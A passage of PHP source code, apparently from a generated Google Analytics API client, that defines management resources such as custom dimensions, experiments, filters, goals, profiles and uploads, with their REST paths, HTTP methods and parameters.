=> [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_accounts = new Analytics\Resource\ManagementAccounts( $this, $this->serviceName, 'accounts', [ 'methods' => [ 'list' => [ 'path' => 'management/accounts', 'httpMethod' => 'GET', 'parameters' => [ 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->management_clientId = new Analytics\Resource\ManagementClientId( $this, $this->serviceName, 'clientId', [ 'methods' => [ 'hashClientId' => [ 'path' => 'management/clientId:hashClientId', 'httpMethod' => 'POST', 'parameters' => [], ], ] ] ); $this->management_customDataSources = new Analytics\Resource\ManagementCustomDataSources( $this, $this->serviceName, 'customDataSources', [ 'methods' => [ 'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDataSources', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->management_customDimensions = new Analytics\Resource\ManagementCustomDimensions( $this, $this->serviceName, 'customDimensions', [ 'methods' => [ 'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDimensions/{customDimensionId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDimensionId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDimensions', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDimensions', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDimensions/{customDimensionId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDimensionId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'ignoreCustomDataSourceLinks' => [ 'location' => 'query', 'type' => 'boolean', ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDimensions/{customDimensionId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDimensionId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'ignoreCustomDataSourceLinks' => [ 'location' => 'query', 'type' => 'boolean', ], ], ], ] ] ); $this->management_customMetrics = new Analytics\Resource\ManagementCustomMetrics( $this, $this->serviceName, 'customMetrics', [ 'methods' => [ 'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customMetrics/{customMetricId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customMetricId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customMetrics', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customMetrics', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customMetrics/{customMetricId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customMetricId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'ignoreCustomDataSourceLinks' => [ 'location' => 'query', 'type' => 'boolean', ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customMetrics/{customMetricId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customMetricId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'ignoreCustomDataSourceLinks' => [ 'location' => 'query', 'type' => 'boolean', ], ], ], ] ] ); $this->management_experiments = new Analytics\Resource\ManagementExperiments( $this, $this->serviceName, 'experiments', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments/{experimentId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'experimentId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments/{experimentId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'experimentId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments/{experimentId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'experimentId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/experiments/{experimentId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'experimentId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_filters = new Analytics\Resource\ManagementFilters( $this, $this->serviceName, 'filters', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/filters/{filterId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'filterId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/filters/{filterId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'filterId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/filters', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/filters', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/filters/{filterId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'filterId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/filters/{filterId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'filterId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_goals = new Analytics\Resource\ManagementGoals( $this, $this->serviceName, 'goals', [ 'methods' => [ 'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/goals/{goalId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'goalId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/goals', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/goals', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/goals/{goalId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'goalId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/goals/{goalId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'goalId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_profileFilterLinks = new Analytics\Resource\ManagementProfileFilterLinks( $this, $this->serviceName, 'profileFilterLinks', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks/{linkId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks/{linkId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks/{linkId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/profileFilterLinks/{linkId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_profileUserLinks = new Analytics\Resource\ManagementProfileUserLinks( $this, $this->serviceName, 'profileUserLinks', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/entityUserLinks/{linkId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/entityUserLinks', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/entityUserLinks', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/entityUserLinks/{linkId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_profiles = new Analytics\Resource\ManagementProfiles( $this, $this->serviceName, 'profiles', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_remarketingAudience = new Analytics\Resource\ManagementRemarketingAudience( $this, $this->serviceName, 'remarketingAudience', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences/{remarketingAudienceId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'remarketingAudienceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences/{remarketingAudienceId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'remarketingAudienceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], 'type' => [ 'location' => 'query', 'type' => 'string', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences/{remarketingAudienceId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'remarketingAudienceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/remarketingAudiences/{remarketingAudienceId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'remarketingAudienceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_segments = new Analytics\Resource\ManagementSegments( $this, $this->serviceName, 'segments', [ 'methods' => [ 'list' => [ 'path' => 'management/segments', 'httpMethod' => 'GET', 'parameters' => [ 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->management_unsampledReports = new Analytics\Resource\ManagementUnsampledReports( $this, $this->serviceName, 'unsampledReports', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/unsampledReports/{unsampledReportId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'unsampledReportId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/unsampledReports/{unsampledReportId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'unsampledReportId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/unsampledReports', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/profiles/{profileId}/unsampledReports', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'profileId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->management_uploads = new Analytics\Resource\ManagementUploads( $this, $this->serviceName, 'uploads', [ 'methods' => [ 'deleteUploadData' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDataSources/{customDataSourceId}/deleteUploadData', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDataSourceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDataSources/{customDataSourceId}/uploads/{uploadId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDataSourceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'uploadId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDataSources/{customDataSourceId}/uploads', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDataSourceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'uploadData' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/customDataSources/{customDataSourceId}/uploads', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'customDataSourceId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_webPropertyAdWordsLinks = new Analytics\Resource\ManagementWebPropertyAdWordsLinks( $this, $this->serviceName, 'webPropertyAdWordsLinks', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks/{webPropertyAdWordsLinkId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyAdWordsLinkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks/{webPropertyAdWordsLinkId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyAdWordsLinkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks/{webPropertyAdWordsLinkId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyAdWordsLinkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityAdWordsLinks/{webPropertyAdWordsLinkId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyAdWordsLinkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_webproperties = new Analytics\Resource\ManagementWebproperties( $this, $this->serviceName, 'webproperties', [ 'methods' => [ 'get' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties', 'httpMethod' 